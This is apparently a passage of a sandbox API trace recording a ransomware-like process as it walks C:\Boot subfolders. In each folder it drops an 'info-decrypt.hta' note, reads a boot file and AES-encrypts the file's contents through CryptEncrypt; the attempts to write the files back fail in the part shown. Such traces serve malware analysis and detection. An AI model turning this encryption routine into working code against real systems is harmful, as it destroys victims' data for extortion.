ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0151.018] FindClose (in: hFindFile=0xb7fad0 | out: hFindFile=0xb7fad0) returned 1 [0151.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0151.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0151.018] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.018] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0151.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0151.018] GetFileAttributesExW (in: lpFileName="C:\\Boot\\es-ES\\info-decrypt.hta" (normalized: "c:\\boot\\es-es\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0151.018] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.018] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0151.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0151.018] CreateFileW (lpFileName="C:\\Boot\\es-ES\\info-decrypt.hta" (normalized: "c:\\boot\\es-es\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0 [0151.020] GetFileType (hFile=0x2f0) returned 0x1 [0151.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0151.020] GetFileType (hFile=0x2f0) returned 0x1 [0151.021] WriteFile (in: hFile=0x2f0, lpBuffer=0x3860608*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x3860608*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0151.022] WriteFile (in: hFile=0x2f0, lpBuffer=0x3860608*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x3860608*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0151.023] CloseHandle (hObject=0x2f0) returned 1 [0151.023] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0151.023] GetFileAttributesExW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3861624 | out: lpFileInformation=0x3861624*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0151.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0151.023] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0151.024] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2f0 [0151.024] GetFileType (hFile=0x2f0) returned 0x1 [0151.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0151.024] GetFileType (hFile=0x2f0) returned 0x1 [0151.024] GetFileSize (in: hFile=0x2f0, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16050 [0151.024] ReadFile (in: hFile=0x2f0, lpBuffer=0x47782e8, nNumberOfBytesToRead=0x16050, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x47782e8*, lpNumberOfBytesRead=0x6a7f1bc*=0x16050, lpOverlapped=0x0) returned 1 [0151.155] CloseHandle (hObject=0x2f0) returned 1 [0151.155] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbe00b8) returned 1 [0151.156] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x3861ae4 | out: pbBuffer=0x3861ae4) returned 1 [0151.545] CryptImportKey (in: hProv=0xbe00b8, pbData=0x3725b00, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xbe1468) returned 1 [0151.545] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.545] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.545] CryptDuplicateKey (in: hKey=0xbe1468, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xbe15e8) returned 1 [0151.545] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0151.545] CryptSetKeyParam (hKey=0xbe15e8, dwParam=0x4, pbData=0x3725be0*=0x1, dwFlags=0x0) returned 1 [0151.545] CryptSetKeyParam (hKey=0xbe15e8, dwParam=0x1, pbData=0x3725bac, dwFlags=0x0) returned 1 [0151.546] CryptEncrypt (in: hKey=0xbe15e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x478e358*, pdwDataLen=0x6a7f188*=0x16060, dwBufLen=0x16060 | out: pbData=0x478e358*, pdwDataLen=0x6a7f188*=0x16060) returned 1 [0151.546] CryptEncrypt (in: hKey=0xbe15e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3725c08*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3725c08*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0151.548] CryptDestroyKey (hKey=0xbe1468) returned 1 [0151.548] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0151.548] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0151.548] GetFullPathNameW (in: lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\es-ES\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0151.548] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0151.550] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0151.550] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0151.550] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0151.550] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0151.550] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe1468 [0151.551] FindNextFileW (in: hFindFile=0xbe1468, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.551] FindNextFileW (in: hFindFile=0xbe1468, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0151.551] FindNextFileW (in: hFindFile=0xbe1468, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0151.551] FindClose (in: hFindFile=0xbe1468 | out: hFindFile=0xbe1468) returned 1 [0151.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0151.551] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0151.551] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0151.551] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI", lpFilePart=0x0) returned 0xd [0151.551] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\", lpFilePart=0x0) returned 0xe [0151.551] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe1468 [0151.552] FindNextFileW (in: hFindFile=0xbe1468, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0151.552] FindNextFileW (in: hFindFile=0xbe1468, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0151.552] FindNextFileW (in: hFindFile=0xbe1468, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0151.552] FindClose (in: hFindFile=0xbe1468 | out: hFindFile=0xbe1468) returned 1 [0151.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0151.552] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0151.552] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.552] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0151.552] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0151.552] GetFileAttributesExW (in: lpFileName="C:\\Boot\\fi-FI\\info-decrypt.hta" (normalized: "c:\\boot\\fi-fi\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0151.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0151.553] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.553] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0151.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0151.553] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\info-decrypt.hta" (normalized: "c:\\boot\\fi-fi\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x328 [0151.596] GetFileType (hFile=0x328) returned 0x1 [0151.596] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0151.596] GetFileType (hFile=0x328) returned 0x1 [0151.596] WriteFile (in: hFile=0x328, lpBuffer=0x375ce8c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x375ce8c*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0151.598] WriteFile (in: hFile=0x328, lpBuffer=0x375ce8c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x375ce8c*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0151.598] CloseHandle (hObject=0x328) returned 1 [0151.598] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0151.598] GetFileAttributesExW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x375dea8 | out: lpFileInformation=0x375dea8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40)) returned 1 [0151.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0151.599] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0151.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0151.599] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x328 [0151.599] GetFileType (hFile=0x328) returned 0x1 [0151.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0151.599] GetFileType (hFile=0x328) returned 0x1 [0151.599] GetFileSize (in: hFile=0x328, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15c40 [0151.599] ReadFile (in: hFile=0x328, lpBuffer=0x47a43d8, nNumberOfBytesToRead=0x15c40, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x47a43d8*, lpNumberOfBytesRead=0x6a7f1bc*=0x15c40, lpOverlapped=0x0) returned 1 [0151.659] CloseHandle (hObject=0x328) returned 1 [0151.660] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xb1dda0) returned 1 [0151.661] CryptGenRandom (in: hProv=0xb1dda0, dwLen=0x10, pbBuffer=0x375e6d8 | out: pbBuffer=0x375e6d8) returned 1 [0153.210] CryptImportKey (in: hProv=0xb1dda0, pbData=0x370b520, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xbe15e8) returned 1 [0153.211] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.211] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.211] CryptDuplicateKey (in: hKey=0xbe15e8, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xbe1468) returned 1 [0153.211] CryptContextAddRef (hProv=0xb1dda0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0153.211] CryptSetKeyParam (hKey=0xbe1468, dwParam=0x4, pbData=0x370b600*=0x1, dwFlags=0x0) returned 1 [0153.211] CryptSetKeyParam (hKey=0xbe1468, dwParam=0x1, pbData=0x370b5cc, dwFlags=0x0) returned 1 [0153.212] CryptEncrypt (in: hKey=0xbe1468, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x47ba038*, pdwDataLen=0x6a7f188*=0x15c50, dwBufLen=0x15c50 | out: pbData=0x47ba038*, pdwDataLen=0x6a7f188*=0x15c50) returned 1 [0153.213] CryptEncrypt (in: hKey=0xbe1468, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x370b628*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x370b628*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0153.215] CryptDestroyKey (hKey=0xbe15e8) returned 1 [0153.215] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0153.215] CryptReleaseContext (hProv=0xb1dda0, dwFlags=0x0) returned 1 [0153.215] GetFullPathNameW (in: lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0153.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0153.216] CreateFileW (lpFileName="C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0153.217] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0153.218] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0153.218] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts", lpFilePart=0x0) returned 0xd [0153.218] GetFullPathNameW (in: lpFileName="C:\\Boot\\Fonts\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\Fonts\\", lpFilePart=0x0) returned 0xe [0153.218] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xbe15e8 [0153.218] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0153.218] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0153.218] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0153.219] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0153.219] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0153.219] FindNextFileW (in: hFindFile=0xbe15e8, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, 